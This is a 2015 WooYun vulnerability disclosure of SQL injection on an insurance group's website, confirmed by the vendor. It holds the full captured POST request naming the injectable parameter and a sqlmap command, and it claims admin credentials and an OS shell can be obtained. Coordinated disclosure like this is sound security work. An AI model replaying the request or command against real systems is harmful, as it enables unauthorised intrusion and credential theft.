当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140606

漏洞标题:泛华保险服务集团主站有SQL注入(可Getshell)

相关厂商:泛华保险服务集团

漏洞作者: ㄚ冷的微笑

提交时间:2015-09-12 09:20

修复时间:2015-10-31 23:04

公开时间:2015-10-31 23:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-12: 细节已通知厂商并且等待厂商处理中
2015-09-16: 厂商已经确认,细节仅向厂商公开
2015-09-26: 细节向核心白帽子及相关领域专家公开
2015-10-06: 细节向普通白帽子公开
2015-10-16: 细节向实习白帽子公开
2015-10-31: 细节向公众公开

简要描述:

泛华保险服务集团主站有SQL注入(可getshell)

详细说明:

RT

漏洞证明:

发现这站漏洞好像有点多,可以走的路好多条...这次是sql injection...
发现参数txt_infoTitle未过滤,可注入成功:

http://www.cninsure.net:80/system/Module/AboutFanHua/Partner_List.aspx?actiontype= (POST)
yy_hdn_checkboxAll=EzGridView1_ctl01_chkBoxAll&yy_hdn_checkboxItem=EzGridView1_ctl02_chkBoxItem|EzGridView1_ctl03_chkBoxItem|EzGridView1_ctl04_chkBoxItem|EzGridView1_ctl05_chkBoxItem|EzGridView1_ctl06_chkBoxItem|EzGridView1_ctl07_chkBoxItem&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTEwNzY5MDYxNjMPFgIeAmRzMpg4AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0YSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAABNTeXN0ZW0uRGF0YS5EYXRhU2V0AwAAABdEYXRhU2V0LlJlbW90aW5nVmVyc2lvbglYbWxTY2hlbWELWG1sRGlmZkdyYW0DAQEOU3lzdGVtLlZlcnNpb24CAAAACQMAAAAGBAAAAMwMPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTE2Ij8%2BDQo8eHM6c2NoZW1hIGlkPSJOZXdEYXRhU2V0IiB4bWxucz0iIiB4bWxuczp4cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zOm1zZGF0YT0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtbXNkYXRhIj4NCiAgPHhzOmVsZW1lbnQgbmFtZT0iTmV3RGF0YVNldCIgbXNkYXRhOklzRGF0YVNldD0idHJ1ZSIgbXNkYXRhOlVzZUN1cnJlbnRMb2NhbGU9InRydWUiPg0KICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgIDx4czpjaG9pY2UgbWluT2NjdXJzPSIwIiBtYXhPY2N1cnM9InVuYm91bmRlZCI%2BDQogICAgICAgIDx4czplbGVtZW50IG5hbWU9ImRzIj4NCiAgICAgICAgICA8eHM6Y29tcGxleFR5cGU%2BDQogICAgICAgICAgICA8eHM6c2VxdWVuY2U%2BDQogICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9IkFib3V0VXNfSUQiIHR5cGU9InhzOmludCIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9IkFUeXBlX0lEIiB0eXBlPSJ4czppbnQiIG1zZGF0YTp0YXJnZXROYW1lc3BhY2U9IiIgbWluT2NjdXJzPSIwIiAvPg0KICAgICAgICAgICAgICA8eHM6ZWxlbWVudCBuYW1lPSJUaXRsZSIgdHlwZT0ieHM6c3RyaW5nIiBtc2RhdGE6dGFyZ2V0TmFtZXNwYWNlPSIiIG1pbk9jY3Vycz0iMCIgLz4NCiAgICAgICAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0iSW1hZ2VVcmwiIHR5cGU9InhzOnN0cmluZyIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9IkRlc2MiIHR5cGU9InhzOnN0cmluZyIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9IkNvbnRlbnQiIHR5cGU9InhzOnN0cmluZyIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9IklzQ2hlY2siIHR5cGU9InhzOmJvb2xlYW4iIG1zZGF0YTp0YXJnZXROYW1lc3BhY2U9IiIgbWluT2NjdXJzPSIwIiAvPg0KICAgICAgICAgICAgICA8eHM6ZWxlbWVudCBuYW1lPSJDcmVhdGVEYXRlIiB0eXBlPSJ4czpkYXRlVGltZSIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9IkNvbXBhbnlfSUQiIHR5cGU9InhzOmludCIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9InB1Yl9pc0FwcHJvdmFsX21pa2UiIHR5cGU9InhzOnN0cmluZyIgbXNkYXRhOnRhcmdldE5hbWVzcGFjZT0iIiBtaW5PY2N1cnM9IjAiIC8%2BDQogICAgICAgICAgICA8L3hzOnNlcXVlbmNlPg0KICAgICAgICAgIDwveHM6Y29tcGxleFR5cGU%2BDQogICAgICAgIDwveHM6ZWxlbWVudD4NCiAgICAgIDwveHM6Y2hvaWNlPg0KICAgIDwveHM6Y29tcGxleFR5cGU%2BDQogIDwveHM6ZWxlbWVudD4NCjwveHM6c2NoZW1hPgYFAAAAoyk8ZGlmZmdyOmRpZmZncmFtIHhtbG5zOm1zZGF0YT0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtbXNkYXRhIiB4bWxuczpkaWZmZ3I9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eG1sLWRpZmZncmFtLXYxIj48TmV3RGF0YVNldD48ZHMgZGlmZmdyOmlkPSJkczEiIG1zZGF0YTpyb3dPcmRlcj0iMCI%2BPEFib3V0VXNfSUQ%2BODc8L0Fib3V0VXNfSUQ%2BPEFUeXBlX0lEPjg8L0FUeXBlX0lEPjxUaXRsZT5NaWtlPC9UaXRsZT48SW1hZ2VVcmw%2BWzIwMDcxMTE0MTA0N10yMDA3MDgyNzA5MTgwOTRkZmE2LmpwZzwvSW1hZ2VVcmw%2BPERlc2MgLz48Q29udGVudD4xPC9Db250ZW50PjxJc0NoZWNrPmZhbHNlPC9Jc0NoZWNrPjxDcmVhdGVEYXRlPjIwMDctMTEtMTRUMDA6MDA6MDArMDg6MDA8L0NyZWF0ZURhdGU%2BPENvbXBhbnlfSUQ%2BMTwvQ29tcGFueV9JRD48cHViX2lzQXBwcm92YWxfbWlrZT7kuI3mmL7npLo8L3B1Yl9pc0FwcHJvdmFsX21pa2U%2BPC9kcz48ZHMgZGlmZmdyOmlkPSJkczIiIG1zZGF0YTpyb3dPcmRlcj0iMSI%2BPEFib3V0VXNfSUQ%2BNjY8L0Fib3V0VXNfSUQ%2BPEFUeXBlX0lEPjg8L0FUeXBlX0lEPjxUaXRsZT7kuK3oi7Hkurrlr7/kv53pmanmnInpmZDlhazlj7g8L1RpdGxlPjxJbWFnZVVybD5bMjAwNzExNjE4NTVdbG9nb196eS5qcGc8L0ltYWdlVXJsPjxEZXNjPmh0dHA6Ly93d3cuYXZpdmEtY29mY28uY29tLmNuLzwvRGVzYz48Q29udGVudD7kuK3oi7Hkurrlr7/kv53pmanmnInpmZDlhazlj7jvvIjnroDnp7DigJzkuK3oi7Hkurrlr7/igJ3vvInnlLHkuJbnlYznrKzkupTlpKfkv53pmanpm4blm6LigJTigJToi7Hlm73oi7HmnbDljY7pm4blm6LkuI7kuK3lm73mnIDlpKfnmoTnsq7msrnpo5/lk4Hov5vlh7rlj6Plhazlj7jlkozlrp7lipvpm4TljprnmoTpo5/lk4HnlJ/kuqfllYbigJTigJTkuK3nsq7pm4blm6LlkIjotYTnu4Tlu7rvvIzms6jlhozotYTmnKzkuLo55Lq/5YWD5Lq65rCR5biB77yM5LqOMjAwM%2BW5tDHmnIgx5pel5Zyo5bm/5bee5q2j5byP5byA5Lia77yM55uu5YmN5Lia5Yqh5bey5omp5bGV6Iez5bm/5Lic44CB5YyX5Lqs44CB5Zub5bed44CB56aP5bu644CB5bGx5Lic44CB5rmW5Y2X562J5YWo5Zu95aSa5Liq55yB5biC5ZKM5Zyw5Yy644CCJmFtcDtuYnNwOyZsdDtCUiZndDsmbHQ7QlImZ3Q76Iux5p2w5Y2O6ZuG5Zui5oiQ56uL5LqOMTY5NuW5tO%2B8jOaAu%2BmDqOiuvuWcqOS8puaVpu%2B8jOWcqDIwMDblubTnvo7lm73jgIrotKLlr4zjgIvmnYLlv5flhazluIPnmoTlhajnkIM1MDDlvLrkvIHkuJrkuK3mjpLlkI3nrKwyOOS9je%2B8jOaYr%2BiLseWbveacgOWkp%2BOAgeS4lueVjOesrOS6lOWkp%2BS/nemZqembhuWbouOAguiLseadsOWNjumbhuWbouaYr%2Basp%2Ba0suaPkOS%2Bm%2BWvv%2BmZqeWSjOWFu%2BiAgemZqeS6p%2BWTgeeahOmihuWFiOiAheS5i%2BS4gO%2B8jOWFtuS4u%2BimgeS4muWKoeWMheaLrOmVv%2Bacn%2BWCqOiThOOAgeWfuumHkeeuoeeQhuWSjOWFtuS7luaZrumAmuS/nemZqeOAguaIquatouWIsDIwMDXlubQxMuaciDMx5pel77yM6Iux5p2w5Y2O6ZuG5Zui5YWo55CD6ZSA5ZSu6aKd5Li6MzUw5Lq/6Iux6ZWR77yM5peX5LiL566h55CG6LWE5Lqn5Li6MzE3MOS6v%2BiLsemVkeOAguS9nOS4uuS4lueVjOacgOWFt%2BWbvemZheaAp%2BeahOWFrOWPuOS5i%2BS4gO%2B8jOiLseadsOWNjumbhuWbouWFqOeQg%2BiMg%2BWbtOWGheWFseaciTYwLDAwMOWQjeWRmOW3peWQkeS4lueVjOWQhOWcsOe6pjMsMDAw5LiH5Liq5a6i5oi35o%2BQ5L6b5LyY6LSo55qE6YeR6J6N5L%2Bd6Zmp5pyN5Yqh44CCJmFtcDtuYnNwOyAmbHQ7QlImZ3Q7PC9Db250ZW50PjxJc0NoZWNrPnRydWU8L0lzQ2hlY2s%2BPENyZWF0ZURhdGU%2BMjAwNy0xMS0wNlQwMDowMDowMCswODowMDwvQ3JlYXRlRGF0ZT48Q29tcGFueV9JRD4xPC9Db21wYW55X0lEPjxwdWJfaXNBcHByb3ZhbF9taWtlPuaYvuekujwvcHViX2lzQXBwcm92YWxfbWlrZT48L2RzPjxkcyBkaWZmZ3I6aWQ9ImRzMyIgbXNkYXRhOnJvd09yZGVyPSIyIj48QWJvdXRVc19JRD42NzwvQWJvdXRVc19JRD48QVR5cGVfSUQ%2BODwvQVR5cGVfSUQ%2BPFRpdGxlPua1t%2BW6t%2BS6uuWvv%2BS/nemZqeaciemZkOWFrOWPuDwvVGl0bGU%2BPEltYWdlVXJsPlsyMDA3MTE2MTkwXWxvZ29faGsuanBnPC9JbWFnZVVybD48RGVzYz5odHRwOi8vd3d3LmFlZ29uLWNub29jLmNvbS88L0Rlc2M%2BPENvbnRlbnQ%2B5rW35bq35Lq65a%2B/5L%2Bd6Zmp5pyJ6ZmQ5YWs5Y%2B45oC76YOo5L2N5LqO5LiK5rW377yM55Sx5oC76LWE5Lqn6L6%2B5YiwMzYzMOS6v%2Basp%2BWFg%2BeahOS4lueVjOacgOWkp%2BeahOS6uuWvv%2BS/nemZqeWFrOWPuOS5i%2BS4gOeahOiNt%2BWFsEFFR09O5L%2Bd6Zmp6ZuG5Zui77yM5LiO5rOo5YaMNTAw5Lq/5Lq65rCR5biB55qE5Lit5Zu95LiJ5aSn5Zu95a6255%2Bz5rK55YWs5Y%2B45LmL5LiA55qE5Lit5Zu95rW35rSL55%2Bz5rK55oC75YWs5Y%2B477yM5ZyoMjAwMuW5tOWFseWQjOWHuui1hOWAvuWKm%2BaJk%2BmAoOiAjOaIkO%2B8jOebruWJjeW3suWcqOWMl%2BS6rOOAgeaxn%2BiLj%2BOAgeWxseS4nOOAgea1meaxn%2BetieWcsOW7uueri%2BS6hjjlrrbliIbmlK/mnLrmnoTjgII8L0NvbnRlbnQ%2BPElzQ2hlY2s%2BdHJ1ZTwvSXNDaGVjaz48Q3JlYXRlRGF0ZT4yMDA3LTExLTA2VDAwOjAwOjAwKzA4OjAwPC9DcmVhdGVEYXRlPjxDb21wYW55X0lEPjE8L0NvbXBhbnlfSUQ%2BPHB1Yl9pc0FwcHJvdmFsX21pa2U%2B5pi%2B56S6PC9wdWJfaXNBcHByb3ZhbF9taWtlPjwvZHM%2BPGRzIGRpZmZncjppZD0iZHM0IiBtc2RhdGE6cm93T3JkZXI9IjMiPjxBYm91dFVzX0lEPjY4PC9BYm91dFVzX0lEPjxBVHlwZV9JRD44PC9BVHlwZV9JRD48VGl0bGU%2B55Sf5ZG95Lq65a%2B/5L%2Bd6Zmp6IKh5Lu95pyJ6ZmQ5YWs5Y%2B4PC9UaXRsZT48SW1hZ2VVcmw%2BWzIwMDcxMTYxOTRdbG9nb19zbS5qcGc8L0ltYWdlVXJsPjxEZXNjPmh0dHA6Ly93d3cuc2luby1saWZlLmNvbS88L0Rlc2M%2BPENvbnRlbnQ%2B55Sf5ZG95Lq65a%2B/5L%2Bd6Zmp6IKh5Lu95pyJ6ZmQ5YWs5Y%2B45piv5LiA5a625Zu96ZmF5YyW5aSn5Z6L6IKh5Lu95Yi25LiT5Lia5a%2B/6Zmp5YWs5Y%2B477yM5oiQ56uL5LqOMjAwMeW5tDEy5pyIMjjml6XvvIzmgLvpg6jorr7lnKjkuIrmtbfmtabkuJzjgILogqHkuJznlLHpppbpkqLmgLvlhazlj7jjgIHlpKfov57lrp7lvrfjgIHkuJzkuqzmtbfkuIrml6XliqjnrYnlpJrlrrblm73lhoXlpJbotYTph5Hpm4TljprnmoTkvIHkuJrmnoTmiJDvvIzmmK/otYTmnKzph5HmnIDkuLrpm4TljprnmoTmlrDlhbTlr7/pmanlhazlj7jkuYvkuIDjgII8L0NvbnRlbnQ%2BPElzQ2hlY2s%2BdHJ1ZTwvSXNDaGVjaz48Q3JlYXRlRGF0ZT4yMDA3LTExLTA2VDAwOjAwOjAwKzA4OjAwPC9DcmVhdGVEYXRlPjxDb21wYW55X0lEPjE8L0NvbXBhbnlfSUQ%2BPHB1Yl9pc0FwcHJvdmFsX21pa2U%2B5pi%2B56S6PC9wdWJfaXNBcHByb3ZhbF9taWtlPjwvZHM%2BPGRzIGRpZmZncjppZD0iZHM1IiBtc2RhdGE6cm93T3JkZXI9IjQiPjxBYm91dFVzX0lEPjY5PC9BYm91dFVzX0lEPjxBVHlwZV9JRD44PC9BVHlwZV9JRD48VGl0bGU%2B6aaW5Yib5a6J5rOw5Lq65a%2B/5L%2Bd6Zmp5pyJ6ZmQ5YWs5Y%2B4PC9UaXRsZT48SW1hZ2VVcmw%2BWzIwMDcxMTYxOTVdbG9nb19zYy5qcGc8L0ltYWdlVXJsPjxEZXNjPmh0dHA6Ly93d3cuaW5nLWNhcC5jb20uY24vPC9EZXNjPjxDb250ZW50PummluWIm%2BWuieazsOS6uuWvv%2BS/nemZqeaciemZkOWFrOWPuOeUseS6q%2BiqieS4lueVjOeahOWkmuWFg%2BWMlumHkeiejembhuWboklOR%2BmbhuWbouaXl%2BS4i0lOR%2BS/nemZqeWFrOWPuO%2B8iOiNt%2BWFsOS/nemZqe%2B8ieS4juebtOWxnuWMl%2BS6rOW4gueahOWbveacieeLrOi1hOWkp%2BWei%2BaKlei1hOi/kOiQpeS8geS4muWMl%2BS6rOmmlumDveWIm%2BS4mumbhuWbouaciemZkOWFrOWPuOWQhOaMgTUwJeiCoeS7vee7hOW7uuiAjOaIkO%2B8jOWFrOWPuOeOsOacieazqOWGjOi1hOacrOS6lOS6v%2BWFg%2BS6uuawkeW4geOAgummluWIm%2BWuieazsOS6uuWvv%2BaYr%2BS4reWbveWKoOWFpeS4lueVjOi0uOaYk%2Be7hOe7h%2BWQju%2B8jOWcqOS4nOWMl%2BWcsOWMuuW8gOS4mueahOesrOS4gOWutuS4u%2BimgeeUseWklui1hOaWuee7j%2BiQpeeuoeeQhueahOS4reWkluWQiOi1hOWvv%2BmZqeWFrOWPuOOAgjwvQ29udGVudD48SXNDaGVjaz50cnVlPC9Jc0NoZWNrPjxDcmVhdGVEYXRlPjIwMDctMTEtMDZUMDA6MDA6MDArMDg6MDA8L0NyZWF0ZURhdGU%2BPENvbXBhbnlfSUQ%2BMTwvQ29tcGFueV9JRD48cHViX2lzQXBwcm92YWxfbWlrZT7mmL7npLo8L3B1Yl9pc0FwcHJvdmFsX21pa2U%2BPC9kcz48ZHMgZGlmZmdyOmlkPSJkczYiIG1zZGF0YTpyb3dPcmRlcj0iNSI%2BPEFib3V0VXNfSUQ%2BNzA8L0Fib3V0VXNfSUQ%2BPEFUeXBlX0lEPjg8L0FUeXBlX0lEPjxUaXRsZT7msJHnlJ/kurrlr7/kv53pmanogqHku73mnInpmZDlhazlj7g8L1RpdGxlPjxJbWFnZVVybD5bMjAwNzExNjE5OF1sb2dvX21zLmpwZzwvSW1hZ2VVcmw%2BPERlc2M%2BaHR0cDovL3d3dy5taW5zaGVuZ2xpZmUuY29tLzwvRGVzYz48Q29udGVudD7msJHnlJ/kurrlr7/kv53pmanogqHku73mnInpmZDlhazlj7jmiJDnq4vkuo4yMDAy5bm077yM5oC76YOo5L2N5LqO5YyX5Lqs77yM5piv55Sx5Lit5Zu95L%2Bd6Zmp55uR552j566h55CG5aeU5ZGY5Lya55u05o6l566h55CG55qE5LiD5a625YWo5Zu95oCn5L%2Bd6Zmp5YWs5Y%2B45LmL5LiA44CCIA0KJmx0O1AmZ3Q75rCR55Sf5Lq65a%2B/55Sx5YWo5Zu95bel5ZWG6IGU54m15aS044CBMjHlrrbkvIHkuJrlj5Hotbforr7nq4vjgILnjrDmnInogqHkuJwyMuWutu%2B8jOWunuaUtui1hOacrOmHkTguNzPkur/lhYPkurrmsJHluIHjgILkuLvopoHogqHkuJzmnInvvJrkuIflkJHotKLliqHmnInpmZDlhazlj7jjgIHkuK3lm73ms5vmtbfmjqfogqHmnInpmZDlhazlj7jjgIHkuK3lm73mnInoibLph5HlsZ7lu7rorr7ogqHku73mnInpmZDlhazlj7jjgIHlsbHopb/mtbfpkavpkqLpk4Hpm4blm6LmnInpmZDlhazlj7jjgIHmsZ/opb/msYfku4Hpm4blm6LljLvoja/np5HnoJTokKXplIDmnInpmZDlhazlj7jjgIHkuJzmlrnluIzmnJvpm4blm6LmnInpmZDlhazlj7jjgIHlm5vlt53mlrDluIzmnJvlhpzkuJrogqHku73mnInpmZDlhazlj7jjgIImbHQ7L1AmZ3Q7PC9Db250ZW50PjxJc0NoZWNrPnRydWU8L0lzQ2hlY2s%2BPENyZWF0ZURhdGU%2BMjAwNy0xMS0wNlQwMDowMDowMCswODowMDwvQ3JlYXRlRGF0ZT48Q29tcGFueV9JRD4xPC9Db21wYW55X0lEPjxwdWJfaXNBcHByb3ZhbF9taWtlPuaYvuekujwvcHViX2lzQXBwcm92YWxfbWlrZT48L2RzPjwvTmV3RGF0YVNldD48L2RpZmZncjpkaWZmZ3JhbT4EAwAAAA5TeXN0ZW0uVmVyc2lvbgQAAAAGX01ham9yBl9NaW5vcgZfQnVpbGQJX1JldmlzaW9uAAAAAAgICAgCAAAAAAAAAP//////////CxYCAgMPZBYIAgMPDxYCHgRUZXh0ZWRkAg8PDxYCHgdWaXNpYmxlaBYCHgdvbmNsaWNrBcgBaWYod2luZG93LmNvbmZpcm0oJ%2BitpuWRijrliKDpmaTmk43kvZzlsIblr7zoh7TmlbDmja7nmoTml6Dms5XmgaLlpI3mgKcsXG5cbuaYr%2BWQpue7p%2Be7reaJp%2BihjOWIoOmZpOaTjeS9nO%2B8nycpKSBkb2N1bWVudC5hbGwoIm15aGlkZGVuIikudmFsdWUgPSAidHJ1ZSI7IGVsc2UgZG9jdW1lbnQuYWxsKCJteWhpZGRlbiIpLnZhbHVlID0gImZhbHNlIjtkAhEPFgIfAmhkAhMPPCsADQIADxYIHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50AgYeEnl5X2hkbl9jaGVja2JveEFsbAUbRXpHcmlkVmlldzFfY3RsMDFfY2hrQm94QWxsHhN5eV9oZG5fY2hlY2tib3hJdGVtBa0BRXpHcmlkVmlldzFfY3RsMDJfY2hrQm94SXRlbXxFekdyaWRWaWV3MV9jdGwwM19jaGtCb3hJdGVtfEV6R3JpZFZpZXcxX2N0bDA0X2Noa0JveEl0ZW18RXpHcmlkVmlldzFfY3RsMDVfY2hrQm94SXRlbXxFekdyaWRWaWV3MV9jdGwwNl9jaGtCb3hJdGVtfEV6R3JpZFZpZXcxX2N0bDA3X2Noa0JveEl0ZW1kCRYIHg1GaXJzdFBhZ2VUZXh0BQbpppbpobUeEFByZXZpb3VzUGFnZVRleHQFCeS4iuS4gOmhtR4MTmV4dFBhZ2VUZXh0BQnkuIvkuIDpobUeDExhc3RQYWdlVGV4dAUG5pyq6aG1FgJmD2QWEmYPZBYCZg9kFgJmDxAPZBYCHwMFFnl5X0NsaWNrQ2hlY2tBbGwodGhpcylkZGQCAQ9kFghmD2QWAmYPEA9kFgIfAwUTeXlfQ2xpY2tDaGVja0l0ZW0oKWRkZAIBD2QWBAIBDw8WAh8BBQRNaWtlZGQCAw8PFgIfAQUCODdkZAICDw8WAh8BBQoyMDA3LTExLTE0ZGQCAw8PFgIfAQUJ5LiN5pi%2B56S6ZGQCAg9kFghmD2QWAmYPEA9kFgIfAwUTeXlfQ2xpY2tDaGVja0l0ZW0oKWRkZAIBD2QWBAIBDw8WAh8BBR7kuK3oi7Hkurrlr7/kv53pmanmnInpmZDlhazlj7hkZAIDDw8WAh8BBQI2NmRkAgIPDxYCHwEFCTIwMDctMTEtNmRkAgMPDxYCHwEFBuaYvuekumRkAgMPZBYIZg9kFgJmDxAPZBYCHwMFE3l5X0NsaWNrQ2hlY2tJdGVtKClkZGQCAQ9kFgQCAQ8PFgIfAQUe5rW35bq35Lq65a%2B/5L%2Bd6Zmp5pyJ6ZmQ5YWs5Y%2B4ZGQCAw8PFgIfAQUCNjdkZAICDw8WAh8BBQkyMDA3LTExLTZkZAIDDw8WAh8BBQbmmL7npLpkZAIED2QWCGYPZBYCZg8QD2QWAh8DBRN5eV9DbGlja0NoZWNrSXRlbSgpZGRkAgEPZBYEAgEPDxYCHwEFJOeUn%2BWRveS6uuWvv%2BS/nemZqeiCoeS7veaciemZkOWFrOWPuGRkAgMPDxYCHwEFAjY4ZGQCAg8PFgIfAQUJMjAwNy0xMS02ZGQCAw8PFgIfAQUG5pi%2B56S6ZGQCBQ9kFghmD2QWAmYPEA9kFgIfAwUTeXlfQ2xpY2tDaGVja0l0ZW0oKWRkZAIBD2QWBAIBDw8WAh8BBSTpppbliJvlronms7Dkurrlr7/kv53pmanmnInpmZDlhazlj7hkZAIDDw8WAh8BBQI2OWRkAgIPDxYCHwEFCTIwMDctMTEtNmRkAgMPDxYCHwEFBuaYvuekumRkAgYPZBYIZg9kFgJmDxAPZBYCHwMFE3l5X0NsaWNrQ2hlY2tJdGVtKClkZGQCAQ9kFgQCAQ8PFgIfAQUk5rCR55Sf5Lq65a%2B/5L%2Bd6Zmp6IKh5Lu95pyJ6ZmQ5YWs5Y%2B4ZGQCAw8PFgIfAQUCNzBkZAICDw8WAh8BBQkyMDA3LTExLTZkZAIDDw8WAh8BBQbmmL7npLpkZAIHDw8WAh8CaGRkAggPDxYCHwJoZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgcFG0V6R3JpZFZpZXcxJGN0bDAxJGNoa0JveEFsbAUcRXpHcmlkVmlldzEkY3RsMDIkY2hrQm94SXRlbQUcRXpHcmlkVmlldzEkY3RsMDMkY2hrQm94SXRlbQUcRXpHcmlkVmlldzEkY3RsMDQkY2hrQm94SXRlbQUcRXpHcmlkVmlldzEkY3RsMDUkY2hrQm94SXRlbQUcRXpHcmlkVmlldzEkY3RsMDYkY2hrQm94SXRlbQUcRXpHcmlkVmlldzEkY3RsMDckY2hrQm94SXRlbQULRXpHcmlkVmlldzEPPCsACgEIAgFkby8u0lWguqm4UDewuN0p%2B/lzO3s%3D&__VIEWSTATEGENERATOR=156277CE&__EVENTVALIDATION=/wEWFgLt5MjqBQL3udnYCgLQhuP4DgKSi6WLBgKPi6WLBgKQi6WLBgK7q7GGCAKM54rGBgKfhbWoCwLpyITLBQLX/Jr0DgKqv4TLBQLX/I6ZBgLnt4TLBQLX/LKuDAKo8ITLBQLX/KbTBQLd6oTLBQLX/OrgAwKe4YTLBQLX/N6FCwKkjIfmAg94nJzNMElG4UyNPj6WWsb8mlLJ&txt_infoTitle=Mike&txt_publicTime=&DropDownList3=3&Button2=%E6%9F%A5%E8%AF%A2&myhidden=


sqlmap.py -r cninsure.txt  -p txt_infoTitle


nnn2.jpg

nnn3.jpg

nnn4.jpg

可捞到管理后台帐密

nnn5.jpg

可拿到os-shell,到这边就好,不深入了

nnn6.jpg

nnn7.jpg

修复方案:

filter

版权声明:转载请注明来源 ㄚ冷的微笑@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-16 23:02

厂商回复:

老系统问题很多,非常感谢。

最新状态:

暂无

漏洞评价:

评论